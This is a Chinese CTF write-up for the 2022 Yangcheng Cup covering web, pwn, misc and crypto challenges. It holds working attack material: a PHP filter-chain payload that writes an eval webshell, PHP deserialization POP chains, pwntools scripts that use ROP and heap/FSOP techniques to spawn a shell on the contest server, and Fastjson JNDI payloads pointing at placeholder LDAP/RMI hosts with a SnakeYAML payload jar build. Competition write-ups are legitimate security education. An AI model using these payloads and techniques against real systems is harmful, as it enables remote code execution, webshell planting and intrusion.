rce_me
-
用伪协议直接RCE写shell
?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC%5fP271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php&0=%65%63%68%6f%20%27%3c%3f%3d%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3f%3e%27%3e%32%2e%74%78%74
-
SUID提权
step_by_step-v3
简单的POP链寻找EXP
<?php
error_reporting(0);
class yang
{
public $y1;
public function __tostring()
{
($this->y1)();
}
public function hint()
{
include_once('hint.php');
if(isset($_GET['file']))
{
$file = $_GET['file'];
if(preg_match("/$hey_mean_then/is", $file))
{
die("nonono");
}
include_once($file);
}
}
}
class cheng
{
public $c1;
public function __wakeup()
{
$this->c1->flag = 'flag';
}
public function __invoke()
{
$this->c1->hint();
}
}
class bei
{
public $b1;
public $b2;
public function __set($k1,$k2)
{
print $this->b1;
}
public function __call($n1,$n2)
{
echo $this->b1;
}
}
$o = new cheng;
$o->c1= new bei();
$o->c1->b1 = new yang;
$o->c1->b1->y1= new cheng;
$o->c1->b1->y1->c1 = new bei;
$o->c1->b1->y1->c1->b1=new yang;
$o->c1->b1->y1->c1->b1->y1="phpinfo";
echo serialize($o);
?>
在phpinfo中找到flag。
ComeAndLogin
登陆后存在源码:
<?php
session_start();
if($_SESSION["admin"] !== True){
die("You are not admin");
}else{
highlight_file(__FILE__);
if(!isset($path)){
$path = $_POST['path'];
if ((substr_count($path,'/') < 3)or(substr_count($path,'.') > 0) or (preg_match("////",$path)) ){
die("invaild path");
}
echo file_get_contents($path);
}
}
/要超过三个,不能含有.不能,不能有//,直接2020 WMCTF中软链接套娃技巧读取flag。
Safepop
原题:https://bbs.pediy.com/thread-271714.htm
<?php
class Fun{
private $func;
public function __construct(){
$this->func = [new Test,'getFlag'];
}
}
class Test{
public function getFlag(){
}
}
class A{
public $a;
}
class B{
public $p;
}
$Class_A = new A;
$Class_B = new B;
$Class_A->a = new Fun;
$Class_B->a = $Class_A;
$payload= serialize($Class_B);
$payload = str_replace('"Fun":1:','"Fun":2:',$payload);
echo urlencode($payload);
MISC1
维吉尼亚解密得到压缩包密码:
Hello friends, I am the President of Ukraine Zelensky. The Russian army has just launched an attack on Ukraine, and the Kyiv airport has been controlled by the Russian army. Heard today is KFC Crazy Thursday, I need someone to bring me 29.94 finger-sucking original chicken as rations now. When I repel the Russian army, I will invite you to come to Ukraine to be the vice president.the password is GWHT@R1nd0yyds
解压得到:
用hint中的脚本编写解码脚本:
from PIL import Image
flag = ''
pic = Image.open("./out.bmp","r")
for y in range(pic.size[1]):
for x in range(pic.size[0]):
pix = pic.getpixel((x,y))
flag=flag+(chr((pix[1]<<8)+pix[2]))
print(flag)
-
flag在文章里面
flag{h1d3_1n_th3_p1ctur3}
MISC2
发现其中45.png文件损坏,缺少一个png头,加上即可,发现45.png与其他图片文件的MD5不一样,直接进行文件比较发现如下提示:
-
发现将这个当做可爱可莉.jpg的outguess密码来跑一下出现flag。
-
flag
YCBSQL
fakeNoOutput
# -*- encoding: utf-8 -*-
import sys
import os
import requests
from pwn import *
binary = './fakeNoOutput'
os.system('chmod +x %s'%binary)
context.update( os = 'linux', arch = 'i386',timeout = 1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
libc = elf.libc
libc = ELF('./libc.so.6')
DEBUG = 0
if DEBUG:
libc = elf.libc
p = process(binary)
else:
host = 'tcp.dasc.buuoj.cn'
port = '28103'
p = remote(host,port)
l64 = lambda : ras(u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')))
l32 = lambda : ras(u32(p.recvuntil('xf7')[-4:].ljust(4,'x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 33[1;36m 0x%x 33[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
def ras( data ):
lg('leak' , data)
return data
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def cmd(num):
sla(':',num)
def attack():
head = 'head /upload HTTP/1.1n'
head += 'HTTP_SERVER1_token: 114514n'
head += 'User-Agent: 114514n'
head += 'Cookie: 114514n'
head += 'Referer: 114514n'
head += 'Content-Length: 5000n'
sl(head)
payload = 'Content:filename=114514'
sl(payload)
# raw_input()
fprintf_got = elf.got['fprintf']
main_addr = 0x8049F77
send_addr = 0x080496A1
payload = 'a'*0x1044
payload += flat(send_addr , main_addr , fprintf_got)
payload = payload.ljust(5000 -25 ,'x01')
# dbg('*0x8049B05')
sl(payload)
libc.address = l32() - libc.sym['fprintf']
binsh_addr = libc.search('/bin/shx00').next()
system_addr = libc.sym['system']
rop = ROP(libc)
rop.system(binsh_addr,0,0)
sl(head)
payload = 'Content:filename=114514'
sl(payload)
payload = 'a'*0x1044
payload += flat(system_addr,system_addr,binsh_addr)
payload = payload.ljust(5000 -25 ,'x01')
# dbg('*0x8049B05')
sl(payload)
p.interactive()
attack()
'''
@File : fakeNoOutput.py
@Time : 2022/09/03 11:01:49
@Author : Niyah
'''
ez_linklist
# -*- encoding: utf-8 -*-
import sys
import os
import requests
from pwn import *
binary = './ez_linklist'
os.system('chmod +x %s'%binary)
context.update( os = 'linux', arch = 'amd64',timeout = 1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
libc = elf.libc
libc = ELF('./libc.so.6')
DEBUG = 0
if DEBUG:
libc = elf.libc
p = process(binary)
# p = process(['qemu-arm', binary])
# p = process(['qemu-arm','-g','1234', binary])
# p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
host = 'tcp.dasc.buuoj.cn'
port = '25325'
p = remote(host,port)
l64 = lambda : ras(u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')))
l32 = lambda : ras(u32(p.recvuntil('xf7')[-4:].ljust(4,'x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 33[1;36m 0x%x 33[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
def ras( data ):
lg('leak' , data)
return data
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def cmd(num):
sla('choice:',num)
def add(size , text = flat(0 , 0x431)):
cmd(1)
sla('Size:' , size)
sa('Content:' , text)
def link(idx , idx2):
cmd(3)
sla('from:' , idx)
sla('to:' , idx2)
def unlink(idx ,offset):
cmd(4)
sla('Index:' , idx)
sla('offset:' , offset)
def delete(idx ,offset):
cmd(2)
sla('Index' , idx)
sla('offset' , offset)
def attack():
add(0x70 )
add(0x70)
link(0 , 1)
unlink(0,0)
delete(1 , 0xff)
add(0x70)
add(0x70)
add(0x70)
add(0x70)
for i in range(0x9):
add(0x70)
link(4,5)
add(0x70)
link(2,1)
link(2,3)
delete(2,2)
delete(2,1)
link(0,2)
cmd(4)
sla('Index:' , 0)
ru('Offset 0:' )
heap_base = uu64(6) - 0x3e0
sla('offset:' , 0)
add(0x18 , flat(0 , 0x30 ,heap_base + 0x490 ))
delete(1,0)
add(0x70)
delete(2,0)
add(0x18 , flat(0 , 0x30 ,heap_base + 0x490 ))
link(0,5)
cmd(4)
sla('Index:' , 0)
ru('Offset 0:' )
__malloc_hook = l64() - 0x70
sla('offset:' , 0)
libc.address = __malloc_hook - libc.sym['__malloc_hook']
system_addr = libc.sym['system']
__free_hook = libc.sym['__free_hook']
binsh_addr = libc.search('/bin/sh').next()
lg('__free_hook',__free_hook)
delete(4 , 1)
add(0x30)
add(0x60 , flat(__free_hook-8 ,0)*6)
add(0x70 )
add(0x70 , flat('/bin/shx00', system_addr))
delete(8,0)
# dbg()
p.interactive()
attack()
'''
@File : ez_linklist.py
@Time : 2022/09/03 09:30:32
@Author : Niyah
'''
dream
# -*- encoding: utf-8 -*-
from ctypes import *
import sys
import os
import requests
from pwn import *
binary = './dream'
os.system('chmod +x %s'%binary)
context.update( os = 'linux', arch = 'amd64',timeout = 1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
libc = elf.libc
# libc = ELF('')
DEBUG = 0
if DEBUG:
libc = elf.libc
p = process(binary)
else:
host = 'tcp.dasc.buuoj.cn'
port = '24495'
p = remote(host,port)
l64 = lambda : ras(u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')))
l32 = lambda : ras(u32(p.recvuntil('xf7')[-4:].ljust(4,'x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 33[1;36m 0x%x 33[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
def ras( data ):
lg('leak' , data)
return data
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def cmd(num):
sla('choice:',num)
def add(id , size , text = 'a'):
cmd(1)
sla('ID:' , id)
sla('long:' , size)
sa('dream:' , text)
def edit(idx , text):
cmd(3)
sla('make?' , idx)
sa('dream:' , text)
def show(idx ):
cmd(4)
sla('show?' , idx)
def delete(idx ):
cmd(2)
sla('wake?' , idx)
def MX(z, y, total, key, p, e):
temp1 = (z.value>>7 ^ y.value<<3) + (y.value>>3 ^ z.value<<4)
temp2 = (total.value ^ y.value) + (key[(p&3) ^ e.value] ^ z.value)
return c_uint32(temp1 ^ temp2)
def decrypt(n, v):
key = [9,5,2,7]
delta = 0x9e3779b9
rounds = 6 + 52//n
total = c_uint32(rounds * delta)
y = c_uint32(v[0])
e = c_uint32(0)
while rounds > 0:
e.value = (total.value >> 2) & 3
for p in range(n-1, 0, -1):
z = c_uint32(v)
v
= c_uint32((v
- MX(z,y,total,key,p,e).value)).value
y.value = v
z = c_uint32(v[n-1])
v[0] = c_uint32(v[0] - MX(z,y,total,key,0,e).value).value
y.value = v[0]
total.value -= delta
rounds -= 1
return v
def pack_file(_flags = 0,
_IO_read_ptr = 0,
_IO_read_end = 0,
_IO_read_base = 0,
_IO_write_base = 0,
_IO_write_ptr = 0,
_IO_write_end = 0,
_IO_buf_base = 0,
_IO_buf_end = 0,
_IO_save_base = 0,
_IO_backup_base = 0,
_IO_save_end = 0,
_IO_marker = 0,
_IO_chain = 0,
_fileno = 0,
_flags2 = 0,
_lock = 0,
_wide_data = 0,
_mode = 0):
file_struct = p32(_flags) +
p32(0) +
p64(_IO_read_ptr) +
p64(_IO_read_end) +
p64(_IO_read_base) +
p64(_IO_write_base) +
p64(_IO_write_ptr) +
p64(_IO_write_end) +
p64(_IO_buf_base) +
p64(_IO_buf_end) +
p64(_IO_save_base) +
p64(_IO_backup_base) +
p64(_IO_save_end) +
p64(_IO_marker) +
p64(_IO_chain) +
p32(_fileno) +
p32(_flags2)
file_struct = file_struct.ljust(0x88, 'x00')
file_struct += p64(_lock)
file_struct = file_struct.ljust(0xa0, 'x00')
file_struct += p64(_wide_data)
file_struct = file_struct.ljust(0xc0, 'x00')
file_struct += p64(_mode)
file_struct = file_struct.ljust(0xd8, 'x00')
return file_struct
def attack():
add(0 ,0x420 , 'aaaaaaaa')
add(1 ,0x400 , 'aaaaaaaa')
add(2 ,0x410 , 'aaaaaaaa')
add(3 ,0x400 )
delete(0)
add(4 , 0x430 )
delete(2)
show(0)
# dbg()
data = []
for i in range(0x420/4):
data.append(uu32())
dbg()
res = decrypt(0x420/4 , data)
print(res)
leak = ( res[1] << 32 ) + res[0]
heap_addr = ( res[5] << 32 ) + res[4]
__malloc_hook = leak - 0x60 - 0x400
libc.address = __malloc_hook - libc.sym['__malloc_hook']
libc_base = libc.address
__free_hook = libc.sym['__free_hook']
lg('__free_hook',__free_hook)
lg('heap_addr',heap_addr)
lg('addr',leak)
stderr = libc.sym['stderr']
edit(0 , flat(leak , leak , heap_addr ,stderr - 0x20))
add(5 ,0x4ff)
delete(5)
add(6 , 0x450)
_IO_wfile_jumps = libc.sym['_IO_wfile_jumps']
_lock = libc_base + 0x1e6680
syscall = libc.sym['alarm'] + 5
setcontext = libc.sym['setcontext']
pop_rax_ret = libc.search(asm('pop rax; ret')).next()
pop_rdi_ret = libc.search(asm('pop rdi; ret')).next()
pop_rsi_ret = libc.search(asm('pop rsi; ret')).next()
pop_rdx_pop_rbx_ret = libc.search(asm('pop rdx ; pop rbx ; ret')).next()
ret = pop_rdi_ret + 1
fake_io_addr = heap_addr + 0x840
flag_addr = fake_io_addr + 0x300 + 0x10
file = pack_file(
_flags = 0,
_lock = _lock,
_IO_write_ptr = 0xa81, # 0xb81
_wide_data = fake_io_addr + 0xe0 ,
) + p64(_IO_wfile_jumps)
rop = ROP(libc)
rop.open(flag_addr , 0,0)
rop.read(3 , flag_addr , 0x40)
rop.write(1 , flag_addr , 0x40)
payload = p64(fake_io_addr + 0xe8)+'x00'*0x98
payload += flat(fake_io_addr + 0xe0*2+0x10 , ret )
payload += 'x00'*0x30
payload += p64(fake_io_addr + 0xe0*2-0x68+8)
payload += p64(setcontext+61)
payload += rop.chain()
payload = file[0x10:] + payload
payload = payload.ljust( 0x300,'x00')+ 'flagx00'
edit(2 , payload)
edit(5 , flat(0 , 0x100)*0x49)
# cmd(5)
cmd(1)
sla('ID:' , 7)
# dbg('_IO_wfile_overflow')
sla('long:' , 0x4ff)
# dbg()
# p.success(getShell())
p.interactive()
attack()
'''
@File : dream.py
@Time : 2022/09/03 17:28:55
@Author : Niyah
'''
simple_json
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"ldap://xxx:port/xxx"}, "msg":{"$ref":"$.content.context"}}
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://xxx:port/tomcat_snakeyaml"}, "msg":{"$ref":"$.content.context"}}
easy_rsa
#!/usr/bin/env python
# coding: utf-8
# In[19]:
f = open("output.txt", "r")
a = f.readlines()
# In[20]:
ns = [0 for i in range(len(a))]
for i in range(len(a)):
ns[11-i] = int(a[i])
# In[38]:
p = gcd(ns[0],ns[1])
tm = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
# In[39]:
e = 65537
for n in ns:
q = n // p
assert(is_prime(q))
d = inverse_mod(e,(p-1)*(q-1))
tm = power_mod(tm,d,n)
# In[40]:
print(tm)
# In[41]:
import libnum
# In[42]:
libnum.n2s(int(tm))
# In[ ]:
lrsa
'''
t=(p*P-58*P+q)%Q
t=(p*P-58*P+q)+kQ
kQ=t-(p-58)*P+q
kQ/P = (p-58) + (t+q)/P
Q/P = (p-58)/k + (t+q)/(kP)
Q/P - (p-58)/k = (t+q)/(kP) < 1/2k^2
'''
from Crypto.Util.number import *
from gmpy2 import gcd
from sympy import isprime
t=44
e=65537
c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746
PPQ = 17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981
PQQ = 17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909
PQ = GCD(PPQ,PQQ)
Q = PQQ // PQ
P = PPQ // PQ
for each in continued_fraction(Q/P).convergents():
p_58 = each.numerator()
k = each.denominator()
p = int(p_58+58)
if p.bit_length() == 1023 and isPrime(int(p)):
# t=(p*P-58*P+q)%Q
q = (t-p*P+58*P) % Q
phi = (p-1)*(q-1)
d = inverse(e,phi)
m = pow(c,d,p*q)
print(long_to_bytes(m))
原文始发于微信公众号(山石网科安全技术研究院):2022年羊城杯部分WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论